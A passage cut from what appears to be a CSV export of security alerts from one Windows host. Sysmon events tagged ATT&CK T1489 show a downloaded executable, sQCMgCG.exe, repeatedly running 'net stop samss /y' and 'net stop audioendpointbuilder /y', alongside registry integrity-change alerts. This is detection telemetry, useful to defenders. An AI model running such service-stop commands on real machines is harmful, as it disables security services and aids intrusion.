/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.297335400Z"",""eventRecordID"":""1706"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.287\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00}\r\nProcessId: 207540\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.287"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-001049181d00}"",""processId"":""207540"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:39.833",10,"Multiple Windows error Application events","""Faulting application name: SearchProtocolHost.exe, version: 7.0.18362.719, time stamp: 0x90c89b37 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1314 +Faulting application start time: 0x01d630ffc4c2980b +Faulting application path: C:\Windows\system32\SearchProtocolHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e71cb7f2-a0e1-4431-a6ac-7b969dc37105 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:45:13.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.987 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-0010984c1600} +ProcessId: 166152 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: 
C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600} +ParentProcessId: 166036 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.989429300Z"",""eventRecordID"":""1699"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.987\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-0010984c1600}\r\nProcessId: 166152\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600}\r\nParentProcessId: 
166036\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.987"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-0010984c1600}"",""processId"":""166152"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ad6-5ec9-0000-001032481600}"",""parentProcessId"":""166036"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:13.512",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.890 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600} +ProcessId: 166036 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.896014800Z"",""eventRecordID"":""1698"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.890\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001032481600}\r\nProcessId: 166036\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 
\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.890"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001032481600}"",""processId"":""166036"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:13.496",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.780 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001049441600} +ProcessId: 165796 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600} +ParentProcessId: 165592 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.784816400Z"",""eventRecordID"":""1697"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.780\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001049441600}\r\nProcessId: 165796\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600}\r\nParentProcessId: 165592\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.780"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001049441600}"",""processId"":""165796"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ad6-5ec9-0000-001034401600}"",""parentProcessId"":""165592"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:13.465",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:10.636 +ProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600} +ProcessId: 165592 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:10.640098400Z"",""eventRecordID"":""1696"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:10.636\r\nProcessGuid: {df9fc3d3-1ad6-5ec9-0000-001034401600}\r\nProcessId: 165592\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:10.636"",""processGuid"":""{df9fc3d3-1ad6-5ec9-0000-001034401600}"",""processId"":""165592"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:10.530",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'ac1e9c4ca0229bb5925b076a73a904cf' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'e46fec78721d7e00a87d2fdb21eb7ed076a5e561' +" +"May 23, 2020 @ 12:45:10.496",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'c41ad3021855ef8cd7c9ad0e4681a63f' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'f369523ae0625f6dfe1d45cdf98cb4d47447d167' +" +"May 23, 2020 @ 12:45:05.660",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.665 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-001009751400} +ProcessId: 121020 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400} +ParentProcessId: 120708 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.667468100Z"",""eventRecordID"":""1695"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.665\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-001009751400}\r\nProcessId: 121020\r\nImage: 
C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010716e1400}\r\nParentProcessId: 120708\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:58.665"",""processGuid"":""{df9fc3d3-1aca-5ec9-0000-001009751400}"",""processId"":""121020"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aca-5ec9-0000-0010716e1400}"",""parentProcessId"":""120708"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop 
\\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:05.638",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:58.559 +ProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010836e1400} +ProcessId: 120716 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aca-5ec9-0000-001003651400} +ParentProcessId: 118972 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:58.604645100Z"",""eventRecordID"":""1694"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:58.559\r\nProcessGuid: {df9fc3d3-1aca-5ec9-0000-0010836e1400}\r\nProcessId: 120716\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
